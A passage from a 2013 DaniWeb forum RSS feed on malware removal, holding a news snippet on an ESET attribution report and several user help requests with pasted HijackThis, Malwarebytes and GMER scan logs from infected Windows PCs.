<p>However, the most compelling argument to suggest that the attacks originate in India is to be found within the ESET research telemetry data. According to Boutin, lots of malware variants tied to the attack appeared in the same location during a small time-frame. These variants were all very similar to each other, which strongly suggests an attempt to evade malware detection. "These files all appeared in the same region of India," Boutin concludes...</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/454905/indian-hackers-take-aim-at-pakistan-data-during-two-year-attack</guid>
		</item>
				<item>
			<title>Corruption Lingers Following Removal of Malware</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454892/corruption-lingers-following-removal-of-malware</link>
			<pubDate>Sat, 18 May 2013 23:59:14 +0000</pubDate>
			<description>Greetings, My laptop was infected with the Rogue Malware called Internet Security 2013. I had some success in removing it after using Malwarebytes, but there are corruptions that linger. For instance, my Microsoft Security Essentials was not recognizing the only user as the administrator. I fixed this by entirely removing ...</description>
			<content:encoded><![CDATA[ <p>Greetings,</p>

<p>My laptop was infected with the Rogue Malware called Internet Security 2013. I had some success in removing it after using Malwarebytes, but there are corruptions that linger. For instance, my Microsoft Security Essentials was not recognizing the only user as the administrator. I fixed this by entirely removing MSE with Microsoft's fix it program; however, I'm now unable to reinstall MSE--even from a flash drive. It is an installation error (probably due to lingering corruption) and not a download error. Of second order is the problem with Internet Explorer. With the infection of the rogue software, IE9 began to refuse everything I tried to download (firefox[second browser], all antivirus/anti-malware software) as a virus and rejected it. I am able to use firefox (once again, ported from a flash drive) and download anything including software.</p>

<p>I have run several different programs and each has either found something that another did not find or has come up clean.</p>

<pre><code>Malwarebytes
Security Check
AdwCleaner
RogueKiller
Microsoft Fix It
RKill
DDS 
</code></pre>

<p>Let me know which logs are desired.</p>

<p>Thanks a bunch,</p>

<p>-OB</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>OutbreaK</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454892/corruption-lingers-following-removal-of-malware</guid>
		</item>
				<item>
			<title>IE automatically opens on startup!</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454876/ie-automaticlly-open-on-startup</link>
			<pubDate>Sat, 18 May 2013 16:58:14 +0000</pubDate>
			<description>I seem to have a problem with my Internet Explorer. It is starting up automatically when I start my computer. I have checked the MSCONFIG and registry settings for startup but iexplore is not listed anywhere, not even in the startup folder. I also did a HijackThis scan and I am ...</description>
			<content:encoded><![CDATA[ <h2>I seem to have a problem with my Internet Explorer. It is starting up automatically when I start my computer. I have checked the MSCONFIG and registry settings for startup but iexplore is not listed anywhere, not even in the startup folder. I also did a HijackThis scan and I am posting it here.</h2>

<p>Logfile of Trend Micro HijackThis v2.0.4<br />
Scan saved at 12:54:56 AM, on 19/5/2013<br />
Platform: Windows 7 SP1 (WinNT 6.00.3505)<br />
MSIE: Internet Explorer v10.0 (10.00.9200.16576)<br />
Boot mode: Normal</p>

<p>Running processes:<br />
C:\Windows\SysWOW64\rundll32.exe<br />
C:\Program Files (x86)\WebcamMax\wcmmon.exe<br />
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe<br />
C:\Program Files (x86)\Launch Manager\LManager.exe<br />
C:\Program Files (x86)\Acer\clear.fi\Movie\clear.fiMovieService.exe<br />
C:\Program Files (x86)\Winamp\winampa.exe<br />
C:\Program Files (x86)\Celcom Broadband\UIExec.exe<br />
C:\Program Files (x86)\Acer\clear.fi\MVP\clear.fiAgent.exe<br />
C:\Program Files (x86)\Launch Manager\LMworker.exe<br />
C:\Program Files (x86)\Acer\clear.fi\MVP.\Kernel\DMR\DMREngine.exe<br />
C:\Program Files (x86)\Mozilla Firefox\firefox.exe<br />
C:\Program Files (x86)\Internet Download Manager\IDMan.exe<br />
C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe<br />
C:\Windows\system32.exe<br />
C:\Program Files (x86)\Internet Explorer\IELowutil.exe<br />
C:\Program Files (x86)\HijackThis\Trend Micro\HiJackThis\HiJackThis.exe</p>

<p>R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://acer.msn.com" rel="nofollow">http://acer.msn.com</a><br />
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://acer.msn.com/" rel="nofollow">http://acer.msn.com/</a><br />
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://go.microsoft.com/fwlink/p/?LinkId=255141" rel="nofollow">http://go.microsoft.com/fwlink/p/?LinkId=255141</a><br />
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a><br />
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a><br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://go.microsoft.com/fwlink/p/?LinkId=255141" rel="nofollow">http://go.microsoft.com/fwlink/p/?LinkId=255141</a><br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =<br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =<br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm<br />
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =<br />
F2 - REG:system.ini: UserInit=userinit.exe<br />
O2 - BHO: IDM Helper - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll<br />
O2 - BHO: WsSVRIEHelper - {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} - C:\Program Files (x86)\Wondershare\Video Converter Ultimate\SVRIEPlugin.dll<br />
O2 - BHO: IESpeakDoc - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll<br />
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll<br />
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll<br />
O4 - HKLM..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k<br />
O4 - HKLM..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"<br />
O4 - HKLM..\Run: [Dolby Advanced Audio v2] "C:\Dolby PCEE4\pcee4.exe" -autostart<br />
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe<br />
O4 - HKLM..\Run: [ArcadeMovieService] "C:\Program Files (x86)\Acer\clear.fi\Movie\clear.fiMovieService.exe"<br />
O4 - HKLM..\Run: [WinampAgent] "C:\Program Files (x86)\Winamp\winampa.exe"<br />
O4 - HKLM..\Run: [BrowserPlugInHelper] C:\Program Files (x86)\Wondershare\Video Converter Ultimate\BrowserPlugInHelper.exe<br />
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe<br />
O4 - HKLM..\Run: [AdobeCS6ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin<br />
O4 - HKLM..\Run: [UIExec] "C:\Program Files (x86)\Celcom Broadband\UIExec.exe"<br />
O4 - HKLM..\Run: [Windows Data Serivce] system32.exe<br />
O4 - HKCU..\Run: [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\MESSEN~1\YahooMessenger.exe" -quiet<br />
O4 - HKCU..\Run: [Facebook Update] "C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver<br />
O4 - HKCU..\Run: [LightShot] C:\Users\User\AppData\Local\Skillbrains\lightshot\LightShot.exe Flags: uninsdeletevalue<br />
O4 - HKCU..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun<br />
O4 - HKCU..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch<br />
O4 - HKCU..\Run: [WebcamMaxAutoRun] "C:\Program Files (x86)\WebcamMax\wcmmon.exe" -a<br />
O4 - HKCU..\Run: [Rfeiez] C:\Users\User\AppData\Roaming\Rfeiez.exe<br />
O4 - HKUS\S-1-5-19..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')<br />
O4 - HKUS\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')<br />
O4 - HKUS\S-1-5-20..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')<br />
O4 - HKUS\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')<br />
O4 - HKUS\S-1-5-18..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')<br />
O4 - HKUS.DEFAULT..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')<br />
O8 - Extra context menu item: Download all links with IDM - C:\Program Files (x86)\Internet Download Manager\IEGetAll.htm<br />
O8 - Extra context menu item: Download with IDM - C:\Program Files (x86)\Internet Download Manager\IEExt.htm<br />
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll<br />
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll<br />
O9 - Extra button: (no name) - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll<br />
O9 - Extra 'Tools' menuitem: Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll<br />
O9 - Extra button: (no name) - {9819CC0E-9669-4D01-9CD7-2C66DA43AC6C} - (no file)<br />
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll<br />
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll<br />
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics<br />
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL<br />
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll<br />
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe<br />
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe<br />
O23 - Service: Arp Intelligent Protection Service (AIPS) - Arcai.com - C:\Program Files (x86)\netcut\services\AIPS.exe<br />
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)<br />
O23 - Service: AtherosSvc - Atheros Commnucations - C:\Program Files (x86)\Bluetooth Suite\adminservice.exe<br />
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe<br />
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)<br />
O23 - Service: EgisTec Ticket Service - Egis Technology Inc.  - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe<br />
O23 - Service: Acer ePower Service (ePowerSvc) - Acer Incorporated - C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe<br />
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)<br />
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe<br />
O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe<br />
O23 - Service: GamesAppService - WildTangent, Inc. - C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe<br />
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe<br />
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe<br />
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe<br />
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe<br />
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe<br />
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe<br />
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)<br />
O23 - Service: @C:\Program Files (x86)\Nero\Update\NASvc.exe,-200 (NAUpdate) - Nero AG - C:\Program Files (x86)\Nero\Update\NASvc.exe<br />
O23 - Service: NitroPDFReaderDriverCreatorReadSpool2 (NitroReaderDriverReadSpool2) - Nitro PDF Software - C:\Program Files\Common Files\Nitro PDF\Reader\2.0\NitroPDFReaderDriverService2x64.exe<br />
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)<br />
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe<br />
O23 - Service: Overwolf Updater Service (OverwolfUpdaterService) - Overwolf Ltd - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe<br />
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: ScsiAccess - Unknown owner - C:\Program Files (x86)\Photodex\ProShow Producer\ScsiAccess.exe<br />
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe<br />
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)<br />
O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe<br />
O23 - Service: TuneUp Utilities Service (TuneUp.UtilitiesSvc) - TuneUp Software - C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesService64.exe<br />
O23 - Service: UI Assistant Service - Unknown owner - C:\Program Files (x86)\Celcom Broadband\AssistantServices.exe<br />
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)<br />
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe<br />
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)<br />
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)<br />
O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe</p>

<p>--<br />
End of file - 12844 bytes</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>hakka.tokumeino</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454876/ie-automaticlly-open-on-startup</guid>
		</item>
				<item>
			<title>Vundo and maybe other issues</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454849/vundo-and-maybe-other-issues</link>
			<pubDate>Sat, 18 May 2013 03:13:06 +0000</pubDate>
			<description>I need to remove Vundo and potentially other issues from my son's computer. BTW **Do not allow your kids to play Pickle **as that seems to be where he got it. *sigh* I've followed all of the instructions from the &quot;Read me before posting&quot; instructions. Your help is much appreciated! ...</description>
			<content:encoded><![CDATA[ <p>I need to remove Vundo and potentially other issues from my son's computer. BTW <strong>Do not allow your kids to play Pickle</strong> as that seems to be where he got it. <em>sigh</em></p>

<p>I've followed all of the instructions from the "Read me before posting" instructions. Your help is much appreciated!</p>

<pre><code>'=========== malwarebytes log =========

Malwarebytes Anti-Malware (Trial) 1.75.0.1300
www.malwarebytes.org

Database version: v2013.05.17.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 10.0.9200.16576
Vincent :: VINCENT-PC [administrator]

Protection: Enabled

5/17/2013 8:47:49 PM
mbam-log-2013-05-17 (20-47-49).txt

Scan type: Full scan (C:\|)
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 375978
Time elapsed: 34 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0} (Trojan.Vundo) -&gt; Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0} (Trojan.Vundo) -&gt; Quarantined and deleted successfully.

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

============ GMER One.log ===========
GMER 2.1.19163 - <a href="http://www.gmer.net" rel="nofollow">http://www.gmer.net</a>
Rootkit scan 2013-05-17 20:20:14
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -&gt; \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD1001FAES-75W7A0 rev.05.01D05 931.51GB
Running: fq2lk3vl.exe; Driver: C:\Users\Vincent\AppData\Local\Temp\uxriifog.sys


---- Threads - GMER 2.1 ----

Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3476]                                          0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3540]                                          0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3568]                                          000007fefb79d880
Thread   C:\Windows\System32\svchost.exe [3700:4476]                                                             000007fef0509688
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4152]                                          000007fefe5d0168
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:808]                                           000007fefbc72a7c
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4424]                                          000007feeab1d618
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:2104]                                          000007fefad35124
---- Processes - GMER 2.1 ----

Library  C:\Program Files\SUPERAntiSpyware\SASCTXMN64.DLL (*** suspicious ***) @ C:\Windows\Explorer.EXE [1896]  0000000002ee0000

---- EOF - GMER 2.1 ----


======== GMER Two.log ========

GMER 2.1.19163 - <a href="http://www.gmer.net" rel="nofollow">http://www.gmer.net</a>
Rootkit scan 2013-05-17 20:39:58
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -&gt; \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD1001FAES-75W7A0 rev.05.01D05 931.51GB
Running: fq2lk3vl.exe; Driver: C:\Users\Vincent\AppData\Local\Temp\uxriifog.sys


---- Threads - GMER 2.1 ----

Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3476]                                                                                                                                    0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3540]                                                                                                                                    0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3568]                                                                                                                                    000007fefb79d880
Thread   C:\Windows\System32\svchost.exe [3700:4476]                                                                                                                                                       000007fef0509688
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4152]                                                                                                                                    000007fefe5d0168
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:808]                                                                                                                                     000007fefbc72a7c
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4424]                                                                                                                                    000007feeab1d618
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:2104]                                                                                                                                    000007fefad35124
---- Processes - GMER 2.1 ----

Library  C:\Program Files\SUPERAntiSpyware\SASCTXMN64.DLL (*** suspicious ***) @ C:\Windows\Explorer.EXE [1896]                                                                                            0000000002ee0000

---- Registry - GMER 2.1 ----

Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Type                                                                                                                                              2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Start                                                                                                                                             2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@ErrorControl                                                                                                                                      1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@DisplayName                                                                                                                                       aswFsBlk
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Group                                                                                                                                             FSFilter Activity Monitor
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@DependOnService                                                                                                                                   FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Description                                                                                                                                       avast! mini-filter driver (aswFsBlk)
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Tag                                                                                                                                               3
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances                                                                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances@DefaultInstance                                                                                                                         aswFsBlk Instance
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances\aswFsBlk Instance                                                                                                                       
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances\aswFsBlk Instance@Altitude                                                                                                              388400
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances\aswFsBlk Instance@Flags                                                                                                                 0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk                                                                                                                                                   
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Type                                                                                                                                             2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Start                                                                                                                                            2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@ErrorControl                                                                                                                                     1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@ImagePath                                                                                                                                        \??\C:\Windows\system32\drivers\aswMonFlt.sys
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@DisplayName                                                                                                                                      aswMonFlt
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Group                                                                                                                                            FSFilter Anti-Virus
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@DependOnService                                                                                                                                  FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Description                                                                                                                                      avast! mini-filter driver (aswMonFlt)
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances                                                                                                                                        
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances@DefaultInstance                                                                                                                        aswMonFlt Instance
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances\aswMonFlt Instance                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances\aswMonFlt Instance@Altitude                                                                                                            320700
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances\aswMonFlt Instance@Flags                                                                                                               0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt                                                                                                                                                  
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Type                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Start                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@DisplayName                                                                                                                                         aswRdr
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Group                                                                                                                                               PNP_TDI
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@DependOnService                                                                                                                                     tcpip?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Description                                                                                                                                         avast! WFP Redirect driver
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@ImagePath                                                                                                                                           \SystemRoot\System32\Drivers\aswrdr2.sys
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr\Parameters                                                                                                                                          
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr\Parameters@MSIgnoreLSPDefault                                                                                                                       
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr\Parameters@WSIgnoreLSPDefault                                                                                                                       nl_lsp.dll,imon.dll,xfire_lsp.dll,mslsp.dll,mssplsp.dll,cwhook.dll,spi.dll,bmnet.dll,winsflt.dll
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@Type                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@Start                                                                                                                                              0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@ErrorControl                                                                                                                                       1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@DisplayName                                                                                                                                        aswRvrt
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@Description                                                                                                                                        avast! Revert
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters                                                                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@BootCounter                                                                                                                             14
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@TickCounter                                                                                                                             3373043
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@SystemRoot                                                                                                                              \Device\Harddisk0\Partition3\Windows
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@ImproperShutdown                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt                                                                                                                                                    
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Type                                                                                                                                                2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Start                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@ErrorControl                                                                                                                                        1
